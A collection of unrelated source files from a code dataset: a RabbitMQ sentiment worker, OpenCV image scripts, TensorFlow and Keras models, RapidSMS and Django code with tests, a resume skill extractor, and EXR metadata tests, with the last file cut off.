neutral\")\n self.log_counter += 1\n return\n\n score = self._map_score(score)\n\n if (self.log_counter % LOG_FREQUENCY == 0):\n logging.info(\"Sending: author_id = %s, date = %s, score = %s\", body_values[AUTHOR_ID], body_values[CREATED_AT], score)\n \n self.send_usr_queues.send(\"{},{}\".format(body_values[AUTHOR_ID], score), body_values[AUTHOR_ID])\n self.send_date_queues.send(\"{},{}\".format(body_values[CREATED_AT], score), body_values[AUTHOR_ID])\n\n self.log_counter += 1\n\n def run(self):\n logging.info(\"Start consuming\")\n self.receive_queue.consume(self._callback)\n logging.info(\"Sending EOM to usr queues\")\n self.send_usr_queues.send_eom()\n logging.info(\"Sending EOM to date queus\")\n self.send_date_queues.send_eom()\n logging.info(\"Finish\")\n\nif __name__ == '__main__':\n config_log(\"ANALYZER\")\n\n rabbitmq_host = os.environ['RABBITMQ_HOST']\n analyzer_workers = int(os.environ['ANALYZER_WORKERS'])\n filter_parser_workers = int(os.environ['FILTER_PARSER_WORKERS'])\n user_reduce_workers = int(os.environ['USER_REDUCER_WORKERS'])\n date_reduce_workers = int(os.environ['DATE_REDUCER_WORKERS'])\n\n worker_id = int(os.environ['SERVICE_ID'])\n\n send_usr_queues = RabbitMQQueues(SEND_USR_QUEUE_NAME, rabbitmq_host, user_reduce_workers)\n send_date_queues = RabbitMQQueues(SEND_DATE_QUEUE_NAME, rabbitmq_host, date_reduce_workers)\n receive_queue = RabbitMQQueue(\"{}{}\".format(RECEIVE_QUEUE_NAME, worker_id), rabbitmq_host, filter_parser_workers)\n worker = TwitterTextSentimentAnalyzer(receive_queue, send_usr_queues, send_date_queues)\n\n logging.info(\"Worker created, started running\")\n\n worker.run()\n\n logging.info(\"Worker finished, exiting\")\n","sub_path":"src/analyzer/analyzer.py","file_name":"analyzer.py","file_ext":"py","file_size_in_byte":3525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"74588329","text":"#!/usr/bin/env python3\n'''doc string'''\n\nimport os\nimport re\nfrom functools import reduce\nfrom shutil import rmtree\n\nimport cv2\n\n\ndef main():\n '''main method'''\n if DO_TEST:\n test(filter_size=25, canny_thresh1=25,\n canny_thresh2=65, use_grayscale=True)\n else:\n run()\n\n\nDO_TEST = False\n\n_REGEX_PAT = r'^(\\.\\/)?\\d+(_real)?$'\n_EXCLUDED_LIST = [\n \"4121715\",\n \"4142865\",\n \"4206482\",\n \"4514553\",\n # \"4538007\",\n \"6093977\",\n]\n\n# GEN_IMAGE = 1\n# REAL_PHOTO = 2\n\n\nclass Preset:\n '''Preset class'''\n\n def __init__(self, filter_size=17, canny_thresh1=30, canny_thresh2=50, use_grayscale=True):\n self.filter_size = filter_size\n self.canny_thresh1 = canny_thresh1\n self.canny_thresh2 = canny_thresh2\n self.use_grayscale = use_grayscale\n\n\nPreset.GEN_IMAGE = Preset(\n filter_size=17, canny_thresh1=30,\n canny_thresh2=50, use_grayscale=False)\nPreset.REAL_PHOTO = Preset(\n filter_size=23, canny_thresh1=30,\n canny_thresh2=50, use_grayscale=True)\nPreset.RP_EID_4538007 = Preset(\n filter_size=25, canny_thresh1=25,\n canny_thresh2=65, use_grayscale=True)\n\n\ndef get_img(f_name):\n '''return image from file name'''\n return cv2.imread(f_name)\n\n\ndef get_bound_rect(img, ftr_size, thresh1, thresh2, use_grayscale):\n '''return x, y, w, h (COOR & DIM) of bounding rectangle from image\n x=0, y=0 is upper left corner'''\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) if use_grayscale else img\n img3 = cv2.GaussianBlur(img, (ftr_size, ftr_size), sigmaX=0)\n imgc = cv2.Canny(img3, thresh1, thresh2)\n x, y, w, h = cv2.boundingRect(imgc)\n return x, y, w, h\n\n\ndef draw_rect(img, x, y, w, h, color, thickness):\n '''draw a rectangle with x, y, w, h (COOR & DIM) on image'''\n return cv2.rectangle(img, (x, y), (x+w, y+h),\n color=color, thickness=thickness)\n\n\ndef get_bounded_img(f_name, filter_size=17, canny_thresh1=30, canny_thresh2=50,\n use_grayscale=True, rect_color=(0, 255, 0), rect_thickness=3,\n use_preset=None):\n '''get image with bounded rectangle from file name'''\n if use_preset is not None:\n filter_size = use_preset.filter_size\n canny_thresh1 = use_preset.canny_thresh1\n canny_thresh2 = use_preset.canny_thresh2\n use_grayscale = use_preset.use_grayscale\n\n img = get_img(f_name)\n x, y, w, h = get_bound_rect(\n img, filter_size, canny_thresh1, canny_thresh2, use_grayscale)\n print((x, y, w, h))\n return draw_rect(img, x, y, w, h, rect_color, rect_thickness)\n\n\ndef test(filter_size=17, canny_thresh1=30, canny_thresh2=50, use_grayscale=False):\n '''for testing'''\n for root, _, files in os.walk(\"test\"):\n out_folder = f\"{root}_rect\"\n if os.path.exists(out_folder):\n rmtree(out_folder)\n os.mkdir(out_folder)\n print(out_folder, \"created\")\n\n for file in files:\n assert isinstance(file, str)\n if not re.search(r'\\.(png|PNG|jpe?g|JPE?G)$', file):\n continue\n\n print(f\"{file} \", end='')\n img = get_img(f\"{root}/{file}\")\n if use_grayscale:\n img2 = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n imgb = cv2.GaussianBlur(img, (filter_size, filter_size), sigmaX=0)\n imgc = cv2.Canny(imgb, canny_thresh1, canny_thresh2)\n x, y, w, h = cv2.boundingRect(imgc)\n imgo = draw_rect(img, x, y, w, h, (0, 255, 0), 3)\n cv2.imshow('imgb', imgb)\n cv2.imshow('imgc', imgc)\n cv2.imshow('imgo', imgo)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n cv2.imwrite(\n f\"{out_folder}/{file}\",\n get_bounded_img(f\"{root}/{file}\")\n )\n\n\ndef run():\n '''run main program'''\n for root, _, files in os.walk(\".\"):\n if not re.search(_REGEX_PAT, root):\n continue\n\n if reduce(\n lambda acc, val: acc | (re.search(val, root) is not None),\n _EXCLUDED_LIST,\n False):\n print(root, \"skipped\")\n continue\n\n # check if folder is GEN_IMAGE or REAL_PHOTO\n is_real_photo = True if re.search(r'_real$', root) else False\n\n if not is_real_photo:\n continue\n\n # create output folder\n out_folder = f\"{root}_rect\"\n if os.path.exists(out_folder):\n rmtree(out_folder)\n os.mkdir(out_folder)\n print(out_folder, \"created\")\n\n # loop all images\n for file in files:\n assert isinstance(file, str)\n if not re.search(r'\\.(png|PNG|jpe?g|JPE?G)$', file):\n continue\n\n print(f\"{file} \", end='')\n\n # select preset\n sel_preset = Preset.REAL_PHOTO if is_real_photo else Preset.GEN_IMAGE\n eid = re.search(\n r'\\d+(?=(_real))?(?!(\\d|_rect|_real_rect))', root).group(0)\n sel_preset = Preset.RP_EID_4538007 if eid == '4538007' and is_real_photo else sel_preset\n img = get_bounded_img(\n f\"{root}/{file}\",\n use_preset=sel_preset\n )\n\n # write image file to output folder\n cv2.imwrite(f\"{out_folder}/{file}\", img)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"img_test.py","file_name":"img_test.py","file_ext":"py","file_size_in_byte":5332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"279895077","text":"import tensorflow as tf\r\nfrom functools import partial\r\n\r\nclass SN(tf.keras.layers.Wrapper):\r\n\tdef __init__(self, layer, **kwargs):\r\n\t\tsuper(SN, self).__init__(layer, **kwargs)\r\n\t\tself.layer = layer\r\n\r\n\tdef build(self, input_shape):\r\n\t\tif not self.layer.built:\r\n\t\t\tself.layer.build(input_shape)\r\n\r\n\t\t\tself.w = self.layer.kernel\r\n\t\t\tself.w_shape = self.w.get_shape().as_list()\r\n\t\t\tself.u = self.add_weight(\"u\",\r\n\t\t\t\t\t\t\t\t\tshape = [self.w_shape[-1], 1],\r\n\t\t\t\t\t\t\t\t\tinitializer = tf.random.normal,\r\n\t\t\t\t\t\t\t\t\ttrainable = False)\r\n\t\tsuper(SN, self).build()\r\n\r\n\tdef call(self, x, train = True):\r\n\r\n\t\tdef _power_iteration(w, train):\r\n\t\t\t_v = tf.matmul(w, self.u)\r\n\t\t\tv = tf.math.l2_normalize(_v, axis = 0)\r\n\t\t\t_u = tf.matmul(tf.transpose(w), v)\r\n\t\t\tu = tf.math.l2_normalize(_u, axis = 0)\r\n\t\t\tif train:\r\n\t\t\t\tself.u.assign(u)\r\n\r\n\t\t\tv = tf.stop_gradient(v)\r\n\t\t\tu = tf.stop_gradient(u)\r\n\t\t\tw = w / (tf.matmul(tf.matmul(tf.transpose(v), w), u))\r\n\t\t\treturn w\r\n\r\n\t\tw = tf.reshape(self.w, [-1, self.w_shape[-1]])\r\n\t\tself.layer.kernel = tf.reshape(_power_iteration(w, train = train), self.w_shape)\r\n\t\treturn self.layer(x)\r\n\r\nclass ConditionalShift(tf.keras.layers.Layer):\r\n\tdef __init__(self, channel, **kwargs):\r\n\t\tsuper(ConditionalShift, self).__init__(**kwargs)\r\n\t\tself.linear_gamma = tf.keras.layers.Dense(channel, \r\n\t\t\tkernel_initializer = tf.ones, # partial(tf.random.normal, mean = 1.0, stddev = 0.01),\r\n\t\t\tuse_bias = False,\r\n\t\t\tname = 'linear_gamma')\r\n\t\tself.linear_beta = tf.keras.layers.Dense(channel, \r\n\t\t\tkernel_initializer = tf.zeros, # partial(tf.random.normal, mean = 0.0, stddev = 0.01),\r\n\t\t\tuse_bias = False,\r\n\t\t\tname = 'linear_beta')\r\n\tdef call(self, x, c):\r\n\t\tn_dim = len(x.get_shape().as_list())\r\n\t\tgamma = self.linear_gamma(c)\r\n\t\tbeta = self.linear_beta(c)\r\n\t\tfor i in range(n_dim - 2):\r\n\t\t\tgamma = tf.expand_dims(gamma, axis = 1)\r\n\t\t\tbeta = tf.expand_dims(beta, axis = 1)\r\n\t\treturn x * gamma + beta\r\n\r\nclass ConditionalBatchNorm(tf.keras.layers.Layer):\r\n\tdef __init__(self, channel, **kwargs):\r\n\t\tsuper(ConditionalBatchNorm, self).__init__(**kwargs)\r\n\t\tself.linear_gamma = tf.keras.layers.Dense(channel, \r\n\t\t\tkernel_initializer = tf.ones,\r\n\t\t\tuse_bias = False,\r\n\t\t\tname = 'linear_gamma')\r\n\t\tself.linear_beta = tf.keras.layers.Dense(channel, \r\n\t\t\tkernel_initializer = tf.zeros,\r\n\t\t\tuse_bias = False,\r\n\t\t\tname = 'linear_beta')\r\n\t\tself.batchnorm = tf.keras.layers.BatchNormalization()\r\n\r\n\tdef call(self, x, c, train = True):\r\n\t\tn_dim = len(x.get_shape().as_list())\r\n\t\tx = self.batchnorm(x)\r\n\t\tgamma = self.linear_gamma(c)\r\n\t\tbeta = self.linear_beta(c)\r\n\t\tfor i in range(n_dim - 2):\r\n\t\t\tgamma = tf.expand_dims(gamma, axis = 1)\r\n\t\t\tbeta = tf.expand_dims(beta, axis = 1)\r\n\t\treturn x * gamma + beta\r\n\r\nclass GResBlock(tf.keras.layers.Layer):\r\n\tdef __init__(self, channel, upsample = True, **kwargs):\r\n\t\tsuper(GResBlock, self).__init__(**kwargs)\r\n\t\tself.deconv1 = SN(tf.keras.layers.Conv2DTranspose(channel, 5, 2 if upsample else 1, 'same', name = 'deconv1', activation = tf.nn.leaky_relu))\r\n\t\tself.cBN1 = ConditionalShift(channel)\r\n\t\tself.deconv2 = SN(tf.keras.layers.Conv2DTranspose(channel, 5, 1, 'same', name = 'deconv2', activation = tf.nn.leaky_relu))\r\n\t\tself.cBN2 = ConditionalShift(channel)\r\n\t\tself.upsample = tf.keras.layers.UpSampling2D(2 if upsample else 1)\r\n\t\tself.deconv3 = SN(tf.keras.layers.Conv2DTranspose(channel, 1, 1, 'same', name = 'deconv3', activation = tf.nn.leaky_relu))\r\n\tdef call(self, x, c, train = True):\r\n\t\ty = self.deconv1(x, train = train)\r\n\t\ty = self.cBN1(y, c)\r\n\t\ty = self.deconv2(y, train = train)\r\n\t\ty = self.cBN2(y, c)\r\n\t\tx = self.deconv3(self.upsample(x), train = train)\r\n\t\treturn x + y\r\n\r\nclass Generator(tf.keras.Model):\r\n\tdef __init__(self, **kwargs):\r\n\t\tsuper(Generator, self).__init__(**kwargs)\r\n\t\tself.layer_stack = []\r\n\t\tself.layer_stack.append(SN(tf.keras.layers.Dense(7 * 7 * 256, activation = tf.nn.leaky_relu, name = 'fc1')))\r\n\t\tself.layer_stack.append(tf.keras.layers.Reshape([7, 7, 256]))\r\n\t\tself.layer_stack.append(GResBlock(128))\r\n\t\tself.layer_stack.append(GResBlock(128))\r\n\t\tself.layer_stack.append(SN(tf.keras.layers.Conv2DTranspose(1, 5, 1, 'same', activation = tf.nn.tanh, name = 'out1')))\r\n\r\n\tdef call(self, x, c, train = True):\r\n\t\tfor layer in self.layer_stack:\r\n\t\t\tif isinstance(layer, SN):\r\n\t\t\t\tx = layer(x, train = train)\r\n\t\t\telif isinstance(layer, GResBlock):\r\n\t\t\t\tx = layer(x, c, train = train)\r\n\t\t\telse:\r\n\t\t\t\tx = layer(x)\r\n\t\treturn x\r\n\r\nclass Discriminator(tf.keras.Model):\r\n\tdef __init__(self, **kwargs):\r\n\t\tsuper(Discriminator, self).__init__(**kwargs)\r\n\t\tself.layer_stack = []\r\n\t\tself.layer_stack.append(SN(tf.keras.layers.Conv2D(128, 5, 1, 'same', activation = tf.nn.leaky_relu, name = 'conv1')))\r\n\t\t# self.layer_stack.append(ConditionalShift(64, name = 'cs1'))\r\n\t\tself.layer_stack.append(SN(tf.keras.layers.Conv2D(128, 5, 2, 'same', activation = tf.nn.leaky_relu, name = 'conv2')))\r\n\t\t# self.layer_stack.append(ConditionalShift(64, name = 'cs2'))\r\n\t\tself.layer_stack.append(SN(tf.keras.layers.Conv2D(128, 5, 2, 'same', activation = tf.nn.leaky_relu, name = 'conv3')))\r\n\t\t\r\n\t\t# self.layer_stack.append(global_sum_pooling)\r\n\t\tself.layer_stack.append(tf.keras.layers.Flatten())\r\n\t\tself.layer_stack.append(SN(tf.keras.layers.Dense(32, activation = tf.nn.leaky_relu, name = 'fc1')))\r\n\t\tself.layer_stack.append(SN(tf.keras.layers.Dense(1, name = 'fc2')))\r\n\r\n\tdef call(self, x, c, train = True):\r\n\t\tc = tf.tile(tf.reshape(c, [-1, 1, 1, 10]), [1, 28, 28, 1])\r\n\t\tx = tf.concat([x, c], axis = 3)\r\n\t\tfor layer in self.layer_stack:\r\n\t\t\tif isinstance(layer, SN):\r\n\t\t\t\tx = layer(x, train = train)\r\n\t\t\telse:\r\n\t\t\t\tx = layer(x)\r\n\t\treturn x\r\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"461092222","text":"#!/usr/bin/env python\n# vim: ai ts=4 sts=4 et sw=4\n\n\nfrom rapidsms.conf import settings\nfrom rapidsms.apps.base import AppBase\nfrom rapidsms_xforms.models import xform_received, XFormSubmission, XFormSubmissionValue\nfrom rapidsms.models import Contact, Connection\nfrom people.models import Person, PersonType\nfrom dateutil import parser\n\n\nclass App(AppBase):\n\n # define a listener\n def handle_submission(sender, **args):\n submission = args['submission']\n xform = args['xform']\n \n if xform.keyword == 'new' and not submission.has_errors:\n chw = submission.connection.contact\n if not chw:\n return None;\n patient_type = PersonType.objects.filter(singular=\"Patient\")[0]\n patient = Person.objects.create(type_id=patient_type.pk)\n patient.reporter.add(chw)\n for value in submission.values.all():\n attr = value.attribute.name\n val = value.value\n #print(attr)\n #print(val)\n if attr == 'name':\n patient.name = val\n elif attr == 'mothers_name':\n patient.mothers_name = val \n elif attr == 'gender':\n patient.gender = val\n elif attr == 'patient_id':\n patient.code = val\n elif attr == 'date_of_birth':\n patient.date_of_birth = Parser.parse(val, dayfirst=True)\n \n patient.submissions.add(submission) \n patient.save()\n return None\n \n if xform.keyword in ('basic','child') and not submission.has_errors:\n for value in submission.values.all():\n attr = value.attribute.name\n val = value.value\n if attr == 'patient_id':\n id = val\n \n patient = Person.objects.filter(code=id)\n if not patient:\n msg.error('Sorry, no patient was found with that ID')\n return None; \t\n patient[0].submissions.add(submission)\n patient[0].save()\n return None\n\n\n\n # then wire it to the xform_received signal\n xform_received.connect(handle_submission)","sub_path":"chw/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"576375483","text":"import pytest\nfrom django.urls import reverse\nfrom rozbieznosci_dyscyplin.models import RozbieznosciView\n\nfrom django.contrib.contenttypes.models import ContentType\n\nfrom bpp.models import Autor_Dyscyplina\n\nfrom django_bpp.selenium_util import wait_for\n\n\n@pytest.fixture\ndef zle_przypisana_praca(\n autor_jan_kowalski,\n jednostka,\n dyscyplina1,\n dyscyplina2,\n dyscyplina3,\n wydawnictwo_ciagle,\n rok,\n):\n Autor_Dyscyplina.objects.create(\n autor=autor_jan_kowalski,\n rok=rok,\n dyscyplina_naukowa=dyscyplina1,\n subdyscyplina_naukowa=dyscyplina2,\n )\n\n wca = wydawnictwo_ciagle.dodaj_autora(autor_jan_kowalski, jednostka)\n\n from django.db import connection\n\n cursor = connection.cursor()\n cursor.execute(\n \"UPDATE bpp_wydawnictwo_ciagle_autor SET dyscyplina_naukowa_id = %s WHERE id = %s\"\n % (dyscyplina3.pk, wca.pk)\n )\n\n # wca.dyscyplina_naukowa_id = dyscyplina3\n # dyscyplina_naukowa=dyscyplina3)\n\n return wydawnictwo_ciagle\n\n\n@pytest.mark.django_db\ndef test_znajdz_rozbieznosci_gdy_przypisanie_autor_dyscyplina(\n autor_jan_kowalski,\n jednostka,\n dyscyplina1,\n dyscyplina2,\n dyscyplina3,\n wydawnictwo_ciagle,\n rok,\n):\n Autor_Dyscyplina.objects.create(\n autor=autor_jan_kowalski,\n rok=rok,\n dyscyplina_naukowa=dyscyplina1,\n subdyscyplina_naukowa=dyscyplina2,\n )\n\n wca = wydawnictwo_ciagle.dodaj_autora(\n autor_jan_kowalski, jednostka, dyscyplina_naukowa=dyscyplina1\n )\n\n assert RozbieznosciView.objects.count() == 0\n\n wca.dyscyplina_naukowa = dyscyplina2\n wca.save()\n\n assert RozbieznosciView.objects.count() == 0\n\n from django.db import connection\n\n cur = connection.cursor()\n cur.execute(\n \"UPDATE bpp_wydawnictwo_ciagle_autor SET dyscyplina_naukowa_id = %s WHERE id = %s\"\n % (dyscyplina3.pk, wca.pk)\n )\n\n assert RozbieznosciView.objects.first().autor == autor_jan_kowalski\n\n wca.dyscyplina_naukowa = None\n wca.save()\n\n assert RozbieznosciView.objects.first().autor == autor_jan_kowalski\n\n\n@pytest.mark.django_db\ndef test_znajdz_rozbieznosci_bez_przypisania_autor_dyscyplina(\n autor_jan_kowalski,\n jednostka,\n dyscyplina1,\n dyscyplina2,\n dyscyplina3,\n wydawnictwo_ciagle,\n rok,\n):\n wca = wydawnictwo_ciagle.dodaj_autora(autor_jan_kowalski, jednostka)\n\n from django.db import connection\n\n cursor = connection.cursor()\n cursor.execute(\n \"UPDATE bpp_wydawnictwo_ciagle_autor SET dyscyplina_naukowa_id = %s WHERE id = %s\"\n % (dyscyplina1.pk, wca.pk)\n )\n\n assert RozbieznosciView.objects.count() == 1\n\n wca.dyscyplina_naukowa = None\n wca.save()\n\n assert RozbieznosciView.objects.count() == 0\n\n\n@pytest.mark.django_db\ndef test_api_rozbieznoscidyscyplin_view_niezalogowany(client, zle_przypisana_praca):\n res = client.get(reverse(\"rozbieznosci_dyscyplin:api-rozbieznosci-dyscyplin\"))\n assert res.status_code == 302\n\n\n@pytest.mark.django_db\ndef test_api_rozbieznoscidyscyplin_view(client, admin_user, zle_przypisana_praca):\n client.login(username=admin_user, password=\"password\")\n res = client.get(reverse(\"rozbieznosci_dyscyplin:api-rozbieznosci-dyscyplin\"))\n assert res.status_code == 200\n assert res.json()[\"data\"][0][\"tytul_oryginalny\"].find(\"target\") > 0\n\n res = client.get(\n reverse(\"rozbieznosci_dyscyplin:api-rozbieznosci-dyscyplin\"),\n {\"search[value]\": \"foo\"},\n )\n assert res.status_code == 200\n\n\n@pytest.mark.django_db\ndef test_redirect_to_admin_view(wydawnictwo_ciagle, client, admin_user):\n res = client.get(\n reverse(\n \"rozbieznosci_dyscyplin:redirect-to-admin\",\n kwargs={\n \"content_type_id\": ContentType.objects.get_for_model(\n wydawnictwo_ciagle\n ).pk,\n \"object_id\": wydawnictwo_ciagle.pk,\n },\n )\n )\n assert res.status_code == 302\n\n client.login(username=admin_user, password=\"password\")\n res2 = client.get(res.url)\n\n assert res2.status_code == 200\n\n\n@pytest.mark.django_db\ndef test_main_view(zle_przypisana_praca, client, admin_user):\n res = client.get(reverse(\"rozbieznosci_dyscyplin:main-view\"))\n assert res.status_code == 302\n\n client.login(username=admin_user, password=\"password\")\n\n res = client.get(reverse(\"rozbieznosci_dyscyplin:main-view\"))\n assert res.status_code == 200\n\n\n@pytest.mark.django_db\ndef test_main_view_admin(zle_przypisana_praca, admin_browser, asgi_live_server):\n admin_browser.visit(\n asgi_live_server.url + reverse(\"rozbieznosci_dyscyplin:main-view\")\n )\n wait_for(lambda: \"Kowalski\" in admin_browser.html)\n","sub_path":"src/rozbieznosci_dyscyplin/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"305468544","text":"import csv\r\nimport re\r\n\r\ndef extract_skills(resume_string):\r\n resume_string = resume_string.replace(',',' ')\r\n\r\n #Converting all the charachters in lower case\r\n \r\n resume_string= resume_string.lower()\r\n # resume_string = re.finditer(r'[a-zA-Z0-9 \\.\\/\\++\\@\\(\\)\\]', resume_string)\r\n\r\n with open(r\"C:\\Users\\HimanshuKholiya\\Desktop\\newUI\\programmingskills.csv\", 'rt') as f:\r\n reader = csv.reader(f)\r\n your_list1 = list(reader)\r\n your_list1 = set(your_list1[0])\r\n your_list1 = [word.lower() for word in your_list1]\r\n\r\n with open(r\"C:\\Users\\HimanshuKholiya\\Desktop\\newUI\\toolandsoftware.csv\", 'rt') as f:\r\n reader = csv.reader(f)\r\n your_list2 = list(reader)\r\n your_list2 = set(your_list2[0])\r\n your_list2 = [word.lower() for word in your_list2] \r\n\r\n your_list = your_list1+your_list2\r\n\r\n your_list = ' | '.join(your_list)\r\n your_list = your_list.replace(r\"+\",r\"\\+\").replace(r\".\",r\"\\.\").replace(r')',r\"\").replace(r'(',r\"\")\r\n mylist = []\r\n try:\r\n matched_list = re.finditer(your_list, resume_string)\r\n for match in matched_list:\r\n mylist.append(match.group())\r\n return list(set(mylist))\r\n except Exception as e:\r\n print(e)\r\n\r\n\r\n","sub_path":"skills.py","file_name":"skills.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"17798062","text":"#!/usr/bin/env python\n\nimport numpy as np\nimport pandas as pd\nimport boto3\nimport pickle\nimport gc\nimport os\nimport sys\nimport traceback\n\nimport utils.config as config\n\nfrom keras import backend as K\nfrom keras import initializers\nfrom keras.engine.topology import Layer\nfrom keras.utils.np_utils import to_categorical\nfrom keras.callbacks import ModelCheckpoint\nfrom keras.models import load_model\nfrom keras.utils import CustomObjectScope\n\ndata_dir = '/opt/ml/input/data/train/'\nmodel_dir = '/opt/ml/model/'\ncheckpoints_dir = '/opt/ml/checkpoints/'\noutput_dir = '/opt/ml/output/'\n\nX_train_file, X_val_file, y_train_file, y_val_file = \\\n data_dir + 'X_train.pkl', data_dir + 'X_val.pkl', data_dir + 'y_train.pkl', data_dir + 'y_val.pkl'\nwith open(X_train_file, 'rb') as infile:\n X_train = pickle.load(infile)\nwith open(X_val_file, 'rb') as infile:\n X_val = pickle.load(infile)\nwith open(y_train_file, 'rb') as infile:\n y_train = pickle.load(infile)\nwith open(y_val_file, 'rb') as infile:\n y_val = pickle.load(infile)\n\nmax_words = config.max_words # max num words processed for each sentence\nmax_sentences = config.max_sentences # max num sentences processed for each article \nmax_vocab = config.max_vocab\nattention_dim = config.attention_dim\nepoch = config.epoch\nbatch_size = config.batch_size\nwords_file = data_dir + 'words.pkl'\nsaved_model_name = 'model.{}.hdf5'.format(epoch - 1)\nsaved_model = data_dir + saved_model_name\n\ny_train = np.asarray(to_categorical(y_train))\ny_val = np.asarray(to_categorical(y_val))\n\nwith open(words_file, 'rb') as infile:\n words = pickle.load(infile)\nword_index = {}\nfor ix, (word, _) in enumerate(words.most_common(max_vocab)):\n word_index[word] = ix + 1\n\ndef create_data_matrix(data, max_sentences=max_sentences, max_words=max_words, max_vocab=max_vocab,\n word_index=word_index):\n data_matrix = np.zeros((len(data), max_sentences, max_words), dtype='int32')\n for i, article in enumerate(data):\n for j, sentence in enumerate(article):\n if j == max_sentences:\n break\n k = 0\n for word in sentence:\n if k == max_words:\n break\n ix = word_index.get(word.lower())\n if ix is not None and ix < max_vocab:\n data_matrix[i, j, k] = ix\n k = k + 1\n return data_matrix\n\nX_train = create_data_matrix(X_train)\nX_val = create_data_matrix(X_val)\n\nfrom tensorflow import matmul\nclass HierarchicalAttentionNetwork(Layer):\n ''''''\n def __init__(self, **kwargs):\n self.init_weights = initializers.get('glorot_normal')\n self.init_bias = initializers.get('zeros')\n self.supports_masking = True\n self.attention_dim = attention_dim\n super().__init__()\n\n def build(self, input_shape):\n assert len(input_shape) == 3\n self.W = K.variable(self.init_weights((input_shape[-1], self.attention_dim)))\n self.b = K.variable(self.init_bias((self.attention_dim,)))\n self.u = K.variable(self.init_weights((self.attention_dim, 1)))\n self.trainable_weights = [self.W, self.b, self.u]\n super().build(input_shape)\n\n def compute_mask(self, inputs, mask=None):\n return None\n\n def call(self, x, mask=None): \n uit = K.tanh(K.bias_add(K.dot(x, self.W), self.b))\n ait = K.exp(K.squeeze(K.dot(uit, self.u), -1))\n \n if mask is not None:\n # Cast the mask to floatX to avoid float64 upcasting\n ait *= K.cast(mask, K.floatx())\n ait /= K.cast(K.sum(ait, axis=1, keepdims=True) + K.epsilon(), K.floatx())\n \n weighted_input = x * K.expand_dims(ait)\n output = K.sum(weighted_input, axis=1)\n\n return output\n\n def compute_output_shape(self, input_shape):\n return input_shape[0], input_shape[-1]\n\nif __name__ == \"__main__\":\n try:\n with CustomObjectScope({'HierarchicalAttentionNetwork': HierarchicalAttentionNetwork}):\n model = load_model(saved_model)\n hist = model.fit(X_train, y_train, validation_data=(X_val, y_val),\n batch_size=batch_size, epochs=1)\n X_train = None\n X_val = None\n y_train = None\n y_val = None\n gc.collect()\n model.save(os.path.join(model_dir, 'model.{}.hdf5'.format(epoch)))\n with open(os.path.join(model_dir, 'history.{}.pkl'.format(epoch)), 'wb') as outfile:\n pickle.dump(hist.history, outfile)\n except Exception as e:\n # Write out an error file. This will be returned as the failureReason in the\n # DescribeTrainingJob result.\n trc = traceback.format_exc()\n with open(os.path.join(output_dir, 'failure'), 'w') as s:\n s.write('Exception during training: ' + str(e) + '\\n' + trc)\n # Printing this causes the exception to be in the training job logs, as well.\n print('Exception during training: ' + str(e) + '\\n' + trc, file=sys.stderr)\n # A non-zero exit code causes the training job to be marked as Failed.\n sys.exit(255)\n\n sys.exit(0)\n","sub_path":"aws_train/train_resume.py","file_name":"train_resume.py","file_ext":"py","file_size_in_byte":5115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"376975526","text":"#-*- coding: utf-8 -*-\nimport pytest\nimport sys\nimport os\n\n# Append the required module\n# Not the best way but it works in Python 2.7\nsys.path.append(\n os.path.join(os.path.abspath(os.path.dirname(__file__)), '..', 'src'))\n\nimport parse_metadata\n\nEXR_IMAGES_DIR_PATH = os.path.join(\n os.path.abspath(os.path.dirname(__file__)), 'openexr-images')\n\n\nclass TestEXRParsing:\n\n rec709_test_image_path = os.path.join(EXR_IMAGES_DIR_PATH, 'Chromaticities',\n 'Rec709.exr')\n\n def test_oserror_thrown_if_file_does_not_exist(self):\n\n exr_path = 'pippo.exr'\n\n with pytest.raises(OSError):\n parse_metadata.read_exr_header(exr_path)\n\n def test_exr_meta_lineOrder(self):\n\n metadata = parse_metadata.read_exr_header(self.rec709_test_image_path)\n assert metadata['lineOrder'] == 'INCREASING_Y'\n\n def test_exr_meta_compression(self):\n\n metadata = parse_metadata.read_exr_header(self.rec709_test_image_path)\n assert metadata['compression'] == 'PIZ_COMPRESSION'\n\n def test_exr_meta_pixelAspectRatio(self):\n\n metadata = parse_metadata.read_exr_header(self.rec709_test_image_path)\n assert metadata['pixelAspectRatio'] == 1\n\n def test_exr_meta_owner(self):\n\n metadata = parse_metadata.read_exr_header(self.rec709_test_image_path)\n assert metadata['owner'] == 'Copyright 2006 Industrial Light & Magic'\n","sub_path":"tests/test_exr.py","file_name":"test_exr.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"11438767","text":"from modeltranslation.translator import translator, TranslationOptions\nfrom .models import Menu, Slider, SubMenu, Context, Personal\nfrom .models import ArticleContext, Gallery, Images\n\n\nclass MenuTranslationOptions(TranslationOptions):\n fields = ('name', 'slug', 'data',)\n\n\nclass SliderTranslationOptions(TranslationOptions):\n fields = ('slider_text',)\n\n\nclass SubMenuTranslationOptions(TranslationOptions):\n fields = ('slug', 'title', 'title2', 'title3',\n 'data', 'data2', 'data3',)\n\n\nclass ContextTranslationOptions(TranslationOptions):\n fields = ('title', 'title2', 'title3', 'title4',\n 'text', 'text2',)\n\n\nclass PersonalTranslationOptions(TranslationOptions):\n fields = ('name', 'prof', 'info')\n\n\nclass ArticleContextTranslationOptions(TranslationOptions):\n fields = ('title', 'title2', 'title3', 'title4',\n 'text1', 'text2', 'text3', 'text4', 